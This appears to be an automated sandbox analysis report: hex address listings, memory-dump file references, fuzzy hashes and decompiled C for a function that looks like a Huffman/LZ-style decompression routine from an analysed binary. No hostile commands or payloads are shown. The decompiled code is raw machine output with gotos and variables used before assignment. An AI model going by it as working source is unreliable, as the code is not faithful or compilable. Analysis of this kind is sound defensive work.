                                                                            0x001a61fc
                                                                            0x001a61fc
                                                                            0x001a61ff
                                                                            0x001a6203
                                                                            0x001a6205
                                                                            0x001a6205
                                                                            0x001a6209
                                                                            0x001a620e
                                                                            0x001a6211
                                                                            0x001a6214
                                                                            0x001a6217
                                                                            0x001a621a
                                                                            0x001a621a
                                                                            0x001a621a
                                                                            0x00000000
                                                                            0x001a621f
                                                                            0x001a61a2
                                                                            0x001a61a4
                                                                            0x001a61a5
                                                                            0x001a61a7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a61ad
                                                                            0x001a61af
                                                                            0x001a61af
                                                                            0x001a61b2
                                                                            0x001a61b2
                                                                            0x001a61b4
                                                                            0x001a61b6
                                                                            0x001a61bc
                                                                            0x001a61c2
                                                                            0x001a61c8
                                                                            0x001a61ce
                                                                            0x001a61d4
                                                                            0x001a61da
                                                                            0x001a61dd
                                                                            0x001a61e0
                                                                            0x001a61e2
                                                                            0x001a61e5
                                                                            0x001a61e7
                                                                            0x001a61e7
                                                                            0x001a61e7
                                                                            0x00000000
                                                                            0x001a615b
                                                                            0x001a615b
                                                                            0x001a615b
                                                                            0x001a6164
                                                                            0x001a6165
                                                                            0x001a5cb9
                                                                            0x001a5cb9
                                                                            0x001a5cc0
                                                                            0x001a5cc5
                                                                            0x001a589e
                                                                            0x001a589e
                                                                            0x001a589e
                                                                            0x001a589e
                                                                            0x001a589e
                                                                            0x001a58a1
                                                                            0x001a58a1
                                                                            0x001a58a1
                                                                            0x001a58a7
                                                                            0x001a58b2
                                                                            0x00000000
                                                                            0x001a58b4
                                                                            0x001a58b4
                                                                            0x001a58b4
                                                                            0x00000000
                                                                            0x001a58b2
                                                                            0x00000000
                                                                            0x001a58a1
                                                                            0x001a5eb2
                                                                            0x001a5eb9
                                                                            0x001a5ecd
                                                                            0x001a5ecd
                                                                            0x001a5ed8
                                                                            0x001a5edb
                                                                            0x001a5ee0
                                                                            0x001a5ee2
                                                                            0x001a5ee4
                                                                            0x001a6001
                                                                            0x001a6001
                                                                            0x001a6003
                                                                            0x001a589e
                                                                            0x001a589e
                                                                            0x001a589e
                                                                            0x001a589e
                                                                            0x001a58a1
                                                                            0x001a58a7
                                                                            0x001a58b2
                                                                            0x00000000
                                                                            0x001a58b4
                                                                            0x001a58b4
                                                                            0x001a58b4
                                                                            0x001a58b2
                                                                            0x001a589e
                                                                            0x001a6009
                                                                            0x001a6009
                                                                            0x001a600f
                                                                            0x001a600f
                                                                            0x001a6015
                                                                            0x001a601a
                                                                            0x001a601e
                                                                            0x001a6021
                                                                            0x001a6026
                                                                            0x001a602f
                                                                            0x001a6031
                                                                            0x001a6031
                                                                            0x001a6031
                                                                            0x001a6259
                                                                            0x001a6259
                                                                            0x00000000
                                                                            0x001a6259
                                                                            0x001a5eea
                                                                            0x001a5eea
                                                                            0x001a5eec
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a5ef2
                                                                            0x001a5ef2
                                                                            0x001a5ef8
                                                                            0x001a5efa
                                                                            0x001a5f00
                                                                            0x001a5f03
                                                                            0x001a5f05
                                                                            0x001a5f4f
                                                                            0x001a5f4f
                                                                            0x001a5f52
                                                                            0x001a5f7d
                                                                            0x001a5f7d
                                                                            0x001a5f80
                                                                            0x001a5f82
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a5f88
                                                                            0x001a5f8a
                                                                            0x001a5f8d
                                                                            0x001a5f90
                                                                            0x001a5f93
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a5f99
                                                                            0x001a5f9c
                                                                            0x001a5f9f
                                                                            0x001a5fa2
                                                                            0x001a5fa5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a5fab
                                                                            0x001a5fae
                                                                            0x001a5fb1
                                                                            0x001a5fb4
                                                                            0x001a5fb7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a5fbd
                                                                            0x001a5fc0
                                                                            0x001a5fc3
                                                                            0x001a5fc6
                                                                            0x001a5fc9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a5fcf
                                                                            0x001a5fd2
                                                                            0x001a5fd5
                                                                            0x001a5fd8
                                                                            0x001a5fdb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a5fe1
                                                                            0x001a5fe4
                                                                            0x001a5fe7
                                                                            0x001a5fea
                                                                            0x001a5fed
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a5ff3
                                                                            0x001a5ff6
                                                                            0x001a589e
                                                                            0x001a589e
                                                                            0x001a589e
                                                                            0x001a589e
                                                                            0x00000000
                                                                            0x001a589e
                                                                            0x001a589e
                                                                            0x001a5f54
                                                                            0x001a5f56
                                                                            0x001a5f56
                                                                            0x001a5f59
                                                                            0x001a5f5d
                                                                            0x001a5f5f
                                                                            0x001a5f5f
                                                                            0x001a5f63
                                                                            0x001a5f68
                                                                            0x001a5f6b
                                                                            0x001a5f6e
                                                                            0x001a5f71
                                                                            0x001a5f74
                                                                            0x001a5f74
                                                                            0x001a5f74
                                                                            0x001a5f79
                                                                            0x001a5f79
                                                                            0x00000000
                                                                            0x001a5f79
                                                                            0x001a5f07
                                                                            0x001a5f09
                                                                            0x001a5f0a
                                                                            0x001a5f0c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a5f0e
                                                                            0x001a5f10
                                                                            0x001a5f10
                                                                            0x001a5f13
                                                                            0x001a5f13
                                                                            0x001a5f15
                                                                            0x001a5f17
                                                                            0x001a5f1d
                                                                            0x001a5f23
                                                                            0x001a5f29
                                                                            0x001a5f2f
                                                                            0x001a5f35
                                                                            0x001a5f3b
                                                                            0x001a5f3e
                                                                            0x001a5f41
                                                                            0x001a5f43
                                                                            0x001a5f46
                                                                            0x001a5f48
                                                                            0x001a5f48
                                                                            0x001a5f48
                                                                            0x00000000
                                                                            0x001a5f4d
                                                                            0x001a5ebb
                                                                            0x001a5ebb
                                                                            0x001a5ec4
                                                                            0x001a5ec5
                                                                            0x00000000
                                                                            0x001a5ec5
                                                                            0x001a5e73
                                                                            0x001a5e7a
                                                                            0x001a5e7f
                                                                            0x001a5e7f
                                                                            0x00000000
                                                                            0x001a589e
                                                                            0x001a6159
                                                                            0x001a60af
                                                                            0x001a60b5
                                                                            0x001a60b8
                                                                            0x001a60b8
                                                                            0x001a60b8
                                                                            0x001a60ba
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a60bc
                                                                            0x001a60bc
                                                                            0x001a60bd
                                                                            0x001a5960
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a5960
                                                                            0x001a58a1

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • Opcode ID: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
                                                                            • Instruction ID: 880f5d2a7f2574217815e33bd0c0e45516a01a8a1e2d7810b74821c5dfab733e
                                                                            • Opcode Fuzzy Hash: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
                                                                            • Instruction Fuzzy Hash: A9623E75608B849FCB29CF74C8906B9BBE2AF96304F09855ED8EB8B346D734E945C710
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 98%
                                                                            			E001A6CDB(void* __ecx) {
                                                                            				intOrPtr* _t347;
                                                                            				signed int _t351;
                                                                            				signed int _t352;
                                                                            				signed int _t353;
                                                                            				signed int _t355;
                                                                            				signed int _t356;
                                                                            				signed int _t357;
                                                                            				signed int _t358;
                                                                            				signed int _t359;
                                                                            				signed int _t361;
                                                                            				signed int _t362;
                                                                            				signed int _t363;
                                                                            				void* _t365;
                                                                            				intOrPtr _t370;
                                                                            				signed int _t380;
                                                                            				char _t389;
                                                                            				unsigned int _t390;
                                                                            				signed int _t397;
                                                                            				void* _t399;
                                                                            				intOrPtr _t404;
                                                                            				signed int _t407;
                                                                            				char _t416;
                                                                            				signed int _t417;
                                                                            				char _t418;
                                                                            				signed int _t420;
                                                                            				signed int _t421;
                                                                            				signed int _t422;
                                                                            				signed int _t423;
                                                                            				signed int _t425;
                                                                            				signed int _t426;
                                                                            				signed short _t427;
                                                                            				signed int _t430;
                                                                            				void* _t435;
                                                                            				intOrPtr _t440;
                                                                            				signed int _t443;
                                                                            				char _t452;
                                                                            				unsigned int _t453;
                                                                            				signed int _t456;
                                                                            				signed int _t457;
                                                                            				signed int _t458;
                                                                            				signed int _t461;
                                                                            				signed int _t462;
                                                                            				signed short _t463;
                                                                            				unsigned int _t467;
                                                                            				unsigned int _t472;
                                                                            				intOrPtr _t489;
                                                                            				signed int _t490;
                                                                            				signed int _t491;
                                                                            				signed int _t492;
                                                                            				signed int _t493;
                                                                            				unsigned int _t496;
                                                                            				unsigned int _t498;
                                                                            				intOrPtr _t499;
                                                                            				signed int _t501;
                                                                            				intOrPtr _t505;
                                                                            				intOrPtr _t506;
                                                                            				intOrPtr _t507;
                                                                            				unsigned int _t510;
                                                                            				void* _t512;
                                                                            				signed int _t515;
                                                                            				signed int* _t518;
                                                                            				unsigned int _t521;
                                                                            				void* _t523;
                                                                            				signed int _t526;
                                                                            				signed int _t529;
                                                                            				intOrPtr _t530;
                                                                            				void* _t532;
                                                                            				signed int _t535;
                                                                            				signed int _t536;
                                                                            				intOrPtr* _t538;
                                                                            				void* _t539;
                                                                            				signed int _t542;
                                                                            				intOrPtr _t545;
                                                                            				unsigned int _t552;
                                                                            				void* _t554;
                                                                            				signed int _t557;
                                                                            				signed int _t559;
                                                                            				signed int _t561;
                                                                            				intOrPtr _t563;
                                                                            				void* _t565;
                                                                            				signed int _t568;
                                                                            				signed int _t569;
                                                                            				signed int _t571;
                                                                            				signed int _t573;
                                                                            				void* _t575;
                                                                            				signed int _t578;
                                                                            				intOrPtr* _t580;
                                                                            				void* _t581;
                                                                            				signed int _t584;
                                                                            				void* _t587;
                                                                            				signed int _t590;
                                                                            				intOrPtr* _t593;
                                                                            				void* _t594;
                                                                            				signed int _t597;
                                                                            				void* _t600;
                                                                            				signed int _t603;
                                                                            				intOrPtr* _t607;
                                                                            				void* _t608;
                                                                            				signed int _t611;
                                                                            				signed int _t614;
                                                                            				unsigned int _t616;
                                                                            				signed int _t619;
                                                                            				signed int _t620;
                                                                            				unsigned int _t622;
                                                                            				signed int _t625;
                                                                            				signed int _t628;
                                                                            				signed int _t629;
                                                                            				signed int _t630;
                                                                            				signed int _t633;
                                                                            				unsigned int _t635;
                                                                            				signed int _t638;
                                                                            				signed int _t641;
                                                                            				signed int _t644;
                                                                            				intOrPtr* _t645;
                                                                            				unsigned int _t647;
                                                                            				signed int _t650;
                                                                            				signed int _t651;
                                                                            				signed int _t652;
                                                                            				signed int _t653;
                                                                            				intOrPtr _t654;
                                                                            				signed int _t655;
                                                                            				signed int _t656;
                                                                            				signed int _t657;
                                                                            				signed int _t658;
                                                                            				signed int _t659;
                                                                            				signed int _t660;
                                                                            				signed int _t661;
                                                                            				signed int _t662;
                                                                            				void* _t663;
                                                                            				intOrPtr _t666;
                                                                            				intOrPtr* _t667;
                                                                            				intOrPtr* _t668;
                                                                            				signed int _t671;
                                                                            				signed int _t673;
                                                                            				intOrPtr* _t675;
                                                                            				signed int _t677;
                                                                            				signed int _t680;
                                                                            				intOrPtr* _t681;
                                                                            				signed int _t682;
                                                                            				signed int _t683;
                                                                            				signed int _t684;
                                                                            				signed int _t685;
                                                                            				void* _t691;
                                                                            
                                                                            				_t654 =  *((intOrPtr*)(_t691 + 0x34));
                                                                            				_t663 = __ecx;
                                                                            				if( *((char*)(_t654 + 0x2c)) != 0) {
                                                                            					L3:
                                                                            					_t505 =  *((intOrPtr*)(_t654 + 0x18));
                                                                            					__eflags =  *((intOrPtr*)(_t654 + 4)) -  *((intOrPtr*)(_t654 + 0x24)) + _t505;
                                                                            					if( *((intOrPtr*)(_t654 + 4)) >  *((intOrPtr*)(_t654 + 0x24)) + _t505) {
                                                                            						L2:
                                                                            						 *((char*)(_t654 + 0x4ad0)) = 1;
                                                                            						return 0;
                                                                            					} else {
                                                                            						_t489 =  *((intOrPtr*)(_t654 + 0x4acc)) - 0x10;
                                                                            						_t666 = _t505 - 1 +  *((intOrPtr*)(_t654 + 0x20));
                                                                            						 *((intOrPtr*)(_t691 + 0x14)) = _t666;
                                                                            						 *((intOrPtr*)(_t691 + 0x10)) = _t489;
                                                                            						 *((intOrPtr*)(_t691 + 0x20)) = _t666;
                                                                            						__eflags = _t666 - _t489;
                                                                            						if(_t666 >= _t489) {
                                                                            							 *((intOrPtr*)(_t691 + 0x20)) = _t489;
                                                                            						}
                                                                            						_t347 = _t654 + 4;
                                                                            						while(1) {
                                                                            							_t614 =  *(_t663 + 0xe6dc);
                                                                            							 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
                                                                            							_t506 =  *_t347;
                                                                            							__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
                                                                            							if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
                                                                            								goto L16;
                                                                            							}
                                                                            							L10:
                                                                            							__eflags = _t506 - _t666;
                                                                            							if(__eflags > 0) {
                                                                            								L100:
                                                                            								_t418 = 1;
                                                                            								L101:
                                                                            								return _t418;
                                                                            							}
                                                                            							if(__eflags != 0) {
                                                                            								L13:
                                                                            								__eflags = _t506 - _t499;
                                                                            								if(_t506 < _t499) {
                                                                            									L15:
                                                                            									__eflags = _t506 -  *((intOrPtr*)(_t654 + 0x4acc));
                                                                            									if(_t506 >=  *((intOrPtr*)(_t654 + 0x4acc))) {
                                                                            										L151:
                                                                            										 *((char*)(_t654 + 0x4ad3)) = 1;
                                                                            										goto L100;
                                                                            									}
                                                                            									goto L16;
                                                                            								}
                                                                            								__eflags =  *((char*)(_t654 + 0x4ad2));
                                                                            								if( *((char*)(_t654 + 0x4ad2)) == 0) {
                                                                            									goto L151;
                                                                            								}
                                                                            								goto L15;
                                                                            							}
                                                                            							__eflags =  *(_t654 + 8) -  *((intOrPtr*)(_t654 + 0x1c));
                                                                            							if( *(_t654 + 8) >=  *((intOrPtr*)(_t654 + 0x1c))) {
                                                                            								goto L100;
                                                                            							}
                                                                            							goto L13;
                                                                            							L16:
                                                                            							_t507 =  *((intOrPtr*)(_t663 + 0x4b3c));
                                                                            							__eflags = (_t507 -  *(_t663 + 0x7c) & _t614) - 0x1004;
                                                                            							if((_t507 -  *(_t663 + 0x7c) & _t614) >= 0x1004) {
                                                                            								L21:
                                                                            								_t667 = _t654 + 4;
                                                                            								_t351 = E0019A4ED(_t667);
                                                                            								_t352 =  *(_t654 + 0xb4);
                                                                            								_t616 = _t351 & 0x0000fffe;
                                                                            								__eflags = _t616 -  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4));
                                                                            								if(_t616 >=  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4))) {
                                                                            									_t490 = 0xf;
                                                                            									_t353 = _t352 + 1;
                                                                            									__eflags = _t353 - _t490;
                                                                            									if(_t353 >= _t490) {
                                                                            										L30:
                                                                            										_t510 =  *(_t667 + 4) + _t490;
                                                                            										 *(_t667 + 4) = _t510 & 0x00000007;
                                                                            										_t355 = _t510 >> 3;
                                                                            										 *_t667 =  *_t667 + _t355;
                                                                            										_t512 = 0x10;
                                                                            										_t515 =  *((intOrPtr*)(_t654 + 0x74 + _t490 * 4)) + (_t616 -  *((intOrPtr*)(_t654 + 0x30 + _t490 * 4)) >> _t512 - _t490);
                                                                            										__eflags = _t515 -  *((intOrPtr*)(_t654 + 0x30));
                                                                            										asm("sbb eax, eax");
                                                                            										_t356 = _t355 & _t515;
                                                                            										__eflags = _t356;
                                                                            										_t619 =  *(_t654 + 0xcb8 + _t356 * 2) & 0x0000ffff;
                                                                            										_t347 = _t654 + 4;
                                                                            										L31:
                                                                            										__eflags = _t619 - 0x100;
                                                                            										if(_t619 >= 0x100) {
                                                                            											__eflags = _t619 - 0x106;
                                                                            											if(_t619 < 0x106) {
                                                                            												__eflags = _t619 - 0x100;
                                                                            												if(_t619 != 0x100) {
                                                                            													__eflags = _t619 - 0x101;
                                                                            													if(_t619 != 0x101) {
                                                                            														_t620 = _t619 + 0xfffffefe;
                                                                            														__eflags = _t620;
                                                                            														_t518 =  &((_t663 + 0x60)[_t620]);
                                                                            														_t491 =  *_t518;
                                                                            														 *(_t691 + 0x24) = _t491;
                                                                            														if(_t620 == 0) {
                                                                            															L122:
                                                                            															_t668 = _t654 + 4;
                                                                            															 *(_t663 + 0x60) = _t491;
                                                                            															_t357 = E0019A4ED(_t668);
                                                                            															_t358 =  *(_t654 + 0x2d78);
                                                                            															_t622 = _t357 & 0x0000fffe;
                                                                            															__eflags = _t622 -  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4));
                                                                            															if(_t622 >=  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4))) {
                                                                            																_t492 = 0xf;
                                                                            																_t359 = _t358 + 1;
                                                                            																__eflags = _t359 - _t492;
                                                                            																if(_t359 >= _t492) {
                                                                            																	L130:
                                                                            																	_t521 =  *(_t668 + 4) + _t492;
                                                                            																	 *(_t668 + 4) = _t521 & 0x00000007;
                                                                            																	_t361 = _t521 >> 3;
                                                                            																	 *_t668 =  *_t668 + _t361;
                                                                            																	_t523 = 0x10;
                                                                            																	_t526 =  *((intOrPtr*)(_t654 + 0x2d38 + _t492 * 4)) + (_t622 -  *((intOrPtr*)(_t654 + 0x2cf4 + _t492 * 4)) >> _t523 - _t492);
                                                                            																	__eflags = _t526 -  *((intOrPtr*)(_t654 + 0x2cf4));
                                                                            																	asm("sbb eax, eax");
                                                                            																	_t362 = _t361 & _t526;
                                                                            																	__eflags = _t362;
                                                                            																	_t363 =  *(_t654 + 0x397c + _t362 * 2) & 0x0000ffff;
                                                                            																	L131:
                                                                            																	_t493 = _t363 & 0x0000ffff;
                                                                            																	__eflags = _t493 - 8;
                                                                            																	if(_t493 >= 8) {
                                                                            																		_t671 = (_t493 >> 2) - 1;
                                                                            																		_t493 = (_t493 & 0x00000003 | 0x00000004) << _t671;
                                                                            																		__eflags = _t493;
                                                                            																	} else {
                                                                            																		_t671 = 0;
                                                                            																	}
                                                                            																	_t496 = _t493 + 2;
                                                                            																	__eflags = _t671;
                                                                            																	if(_t671 != 0) {
                                                                            																		_t390 = E0019A4ED(_t654 + 4);
                                                                            																		_t532 = 0x10;
                                                                            																		_t496 = _t496 + (_t390 >> _t532 - _t671);
                                                                            																		_t535 =  *(_t654 + 8) + _t671;
                                                                            																		 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t535 >> 3);
                                                                            																		_t536 = _t535 & 0x00000007;
                                                                            																		__eflags = _t536;
                                                                            																		 *(_t654 + 8) = _t536;
                                                                            																	}
                                                                            																	_t625 =  *(_t663 + 0x7c);
                                                                            																	_t673 = _t625 -  *(_t691 + 0x24);
                                                                            																	_t365 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
                                                                            																	 *(_t663 + 0x74) = _t496;
                                                                            																	__eflags = _t673 - _t365;
                                                                            																	if(_t673 >= _t365) {
                                                                            																		L147:
                                                                            																		_t347 = _t654 + 4;
                                                                            																		__eflags = _t496;
                                                                            																		if(_t496 == 0) {
                                                                            																			goto L7;
                                                                            																		}
                                                                            																		_t655 =  *(_t663 + 0xe6dc);
                                                                            																		do {
                                                                            																			_t656 = _t655 & _t673;
                                                                            																			_t673 = _t673 + 1;
                                                                            																			 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t656 +  *((intOrPtr*)(_t663 + 0x4b40))));
                                                                            																			_t655 =  *(_t663 + 0xe6dc);
                                                                            																			 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t655;
                                                                            																			_t496 = _t496 - 1;
                                                                            																			__eflags = _t496;
                                                                            																		} while (_t496 != 0);
                                                                            																		L150:
                                                                            																		_t654 =  *((intOrPtr*)(_t691 + 0x3c));
                                                                            																		L33:
                                                                            																		_t347 = _t654 + 4;
                                                                            																		goto L7;
                                                                            																	} else {
                                                                            																		__eflags = _t625 - _t365;
                                                                            																		if(_t625 >= _t365) {
                                                                            																			goto L147;
                                                                            																		}
                                                                            																		_t370 =  *((intOrPtr*)(_t663 + 0x4b40));
                                                                            																		_t675 = _t673 + _t370;
                                                                            																		_t529 = _t370 + _t625;
                                                                            																		 *(_t691 + 0x1c) = _t529;
                                                                            																		 *(_t663 + 0x7c) = _t625 + _t496;
                                                                            																		__eflags =  *(_t691 + 0x24) - _t496;
                                                                            																		if( *(_t691 + 0x24) >= _t496) {
                                                                            																			__eflags = _t496 - 8;
                                                                            																			if(_t496 < 8) {
                                                                            																				L85:
                                                                            																				_t347 = _t654 + 4;
                                                                            																				__eflags = _t498;
                                                                            																				if(_t498 == 0) {
                                                                            																					L7:
                                                                            																					L8:
                                                                            																					_t666 =  *((intOrPtr*)(_t691 + 0x14));
                                                                            																					while(1) {
                                                                            																						_t614 =  *(_t663 + 0xe6dc);
                                                                            																						 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
                                                                            																						_t506 =  *_t347;
                                                                            																						__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
                                                                            																						if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
                                                                            																							goto L16;
                                                                            																						}
                                                                            																						goto L10;
                                                                            																					}
                                                                            																				}
                                                                            																				 *_t529 =  *_t675;
                                                                            																				_t347 = _t654 + 4;
                                                                            																				__eflags = _t498 - 1;
                                                                            																				if(_t498 <= 1) {
                                                                            																					goto L7;
                                                                            																				}
                                                                            																				 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
                                                                            																				_t347 = _t654 + 4;
                                                                            																				__eflags = _t498 - 2;
                                                                            																				if(_t498 <= 2) {
                                                                            																					goto L7;
                                                                            																				}
                                                                            																				 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
                                                                            																				_t347 = _t654 + 4;
                                                                            																				__eflags = _t498 - 3;
                                                                            																				if(_t498 <= 3) {
                                                                            																					goto L7;
                                                                            																				}
                                                                            																				 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
                                                                            																				_t347 = _t654 + 4;
                                                                            																				__eflags = _t498 - 4;
                                                                            																				if(_t498 <= 4) {
                                                                            																					goto L7;
                                                                            																				}
                                                                            																				 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
                                                                            																				_t347 = _t654 + 4;
                                                                            																				__eflags = _t498 - 5;
                                                                            																				if(_t498 <= 5) {
                                                                            																					goto L7;
                                                                            																				}
                                                                            																				__eflags = _t498 - 6;
                                                                            																				_t499 =  *((intOrPtr*)(_t691 + 0x10));
                                                                            																				 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
                                                                            																				_t347 = _t654 + 4;
                                                                            																				if(_t498 > 6) {
                                                                            																					 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
                                                                            																					_t347 = _t654 + 4;
                                                                            																				}
                                                                            																				goto L8;
                                                                            																			}
                                                                            																			_t380 = _t496 >> 3;
                                                                            																			__eflags = _t380;
                                                                            																			 *(_t691 + 0x24) = _t380;
                                                                            																			_t657 = _t380;
                                                                            																			do {
                                                                            																				E001AEA80(_t529, _t675, 8);
                                                                            																				_t530 =  *((intOrPtr*)(_t691 + 0x28));
                                                                            																				_t691 = _t691 + 0xc;
                                                                            																				_t529 = _t530 + 8;
                                                                            																				_t675 = _t675 + 8;
                                                                            																				_t496 = _t496 - 8;
                                                                            																				 *(_t691 + 0x1c) = _t529;
                                                                            																				_t657 = _t657 - 1;
                                                                            																				__eflags = _t657;
                                                                            																			} while (_t657 != 0);
                                                                            																			L84:
                                                                            																			_t654 =  *((intOrPtr*)(_t691 + 0x3c));
                                                                            																			goto L85;
                                                                            																		}
                                                                            																		__eflags = _t496 - 8;
                                                                            																		if(_t496 < 8) {
                                                                            																			goto L85;
                                                                            																		}
                                                                            																		_t628 = _t496 >> 3;
                                                                            																		__eflags = _t628;
                                                                            																		do {
                                                                            																			_t496 = _t496 - 8;
                                                                            																			 *_t529 =  *_t675;
                                                                            																			 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
                                                                            																			 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
                                                                            																			 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
                                                                            																			 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
                                                                            																			 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
                                                                            																			 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
                                                                            																			_t389 =  *((intOrPtr*)(_t675 + 7));
                                                                            																			_t675 = _t675 + 8;
                                                                            																			 *((char*)(_t529 + 7)) = _t389;
                                                                            																			_t529 = _t529 + 8;
                                                                            																			_t628 = _t628 - 1;
                                                                            																			__eflags = _t628;
                                                                            																		} while (_t628 != 0);
                                                                            																		goto L85;
                                                                            																	}
                                                                            																}
                                                                            																_t538 = _t654 + (_t359 + 0xb3e) * 4;
                                                                            																while(1) {
                                                                            																	__eflags = _t622 -  *_t538;
                                                                            																	if(_t622 <  *_t538) {
                                                                            																		break;
                                                                            																	}
                                                                            																	_t359 = _t359 + 1;
                                                                            																	_t538 = _t538 + 4;
                                                                            																	__eflags = _t359 - 0xf;
                                                                            																	if(_t359 < 0xf) {
                                                                            																		continue;
                                                                            																	}
                                                                            																	goto L130;
                                                                            																}
                                                                            																_t492 = _t359;
                                                                            																goto L130;
                                                                            															}
                                                                            															_t539 = 0x10;
                                                                            															_t629 = _t622 >> _t539 - _t358;
                                                                            															_t542 = ( *(_t629 + _t654 + 0x2d7c) & 0x000000ff) +  *(_t668 + 4);
                                                                            															 *_t668 =  *_t668 + (_t542 >> 3);
                                                                            															 *(_t668 + 4) = _t542 & 0x00000007;
                                                                            															_t363 =  *(_t654 + 0x317c + _t629 * 2) & 0x0000ffff;
                                                                            															goto L131;
                                                                            														} else {
                                                                            															goto L121;
                                                                            														}
                                                                            														do {
                                                                            															L121:
                                                                            															 *_t518 =  *(_t518 - 4);
                                                                            															_t518 = _t518 - 4;
                                                                            															_t620 = _t620 - 1;
                                                                            															__eflags = _t620;
                                                                            														} while (_t620 != 0);
                                                                            														goto L122;
                                                                            													}
                                                                            													_t498 =  *(_t663 + 0x74);
                                                                            													_t666 =  *((intOrPtr*)(_t691 + 0x14));
                                                                            													__eflags = _t498;
                                                                            													if(_t498 == 0) {
                                                                            														L23:
                                                                            														_t499 =  *((intOrPtr*)(_t691 + 0x10));
                                                                            														continue;
                                                                            													}
                                                                            													_t397 =  *(_t663 + 0x60);
                                                                            													_t630 =  *(_t663 + 0x7c);
                                                                            													_t677 = _t630 - _t397;
                                                                            													 *(_t691 + 0x1c) = _t397;
                                                                            													_t399 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
                                                                            													__eflags = _t677 - _t399;
                                                                            													if(_t677 >= _t399) {
                                                                            														L116:
                                                                            														_t347 = _t654 + 4;
                                                                            														__eflags = _t498;
                                                                            														if(_t498 == 0) {
                                                                            															goto L7;
                                                                            														}
                                                                            														_t658 =  *(_t663 + 0xe6dc);
                                                                            														do {
                                                                            															_t659 = _t658 & _t677;
                                                                            															_t677 = _t677 + 1;
                                                                            															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t659 +  *((intOrPtr*)(_t663 + 0x4b40))));
                                                                            															_t658 =  *(_t663 + 0xe6dc);
                                                                            															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t658;
                                                                            															_t498 = _t498 - 1;
                                                                            															__eflags = _t498;
                                                                            														} while (_t498 != 0);
                                                                            														goto L150;
                                                                            													}
                                                                            													__eflags = _t630 - _t399;
                                                                            													if(_t630 >= _t399) {
                                                                            														goto L116;
                                                                            													}
                                                                            													_t404 =  *((intOrPtr*)(_t663 + 0x4b40));
                                                                            													_t675 = _t677 + _t404;
                                                                            													_t529 = _t404 + _t630;
                                                                            													 *(_t691 + 0x24) = _t529;
                                                                            													 *(_t663 + 0x7c) = _t630 + _t498;
                                                                            													__eflags =  *(_t691 + 0x1c) - _t498;
                                                                            													if( *(_t691 + 0x1c) >= _t498) {
                                                                            														__eflags = _t498 - 8;
                                                                            														if(_t498 < 8) {
                                                                            															goto L85;
                                                                            														}
                                                                            														_t407 = _t498 >> 3;
                                                                            														__eflags = _t407;
                                                                            														_t660 = _t407;
                                                                            														do {
                                                                            															E001AEA80(_t529, _t675, 8);
                                                                            															_t545 =  *((intOrPtr*)(_t691 + 0x30));
                                                                            															_t691 = _t691 + 0xc;
                                                                            															_t529 = _t545 + 8;
                                                                            															_t675 = _t675 + 8;
                                                                            															_t498 = _t498 - 8;
                                                                            															 *(_t691 + 0x24) = _t529;
                                                                            															_t660 = _t660 - 1;
                                                                            															__eflags = _t660;
                                                                            														} while (_t660 != 0);
                                                                            														goto L84;
                                                                            													}
